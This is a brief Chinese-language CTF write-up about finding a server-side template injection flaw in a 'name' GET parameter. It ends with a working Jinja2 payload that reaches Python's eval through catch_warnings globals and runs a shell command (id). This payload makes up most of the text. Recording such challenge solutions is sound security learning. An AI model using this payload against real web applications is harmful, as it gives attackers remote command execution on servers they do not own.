页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。
是要GET一个参数name,这个不好想到
顺便确定有SSTI漏洞
<加字母就会被过滤
Smarty中的方法也不能用了
获取eval函数并执行任意python代码的POC
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}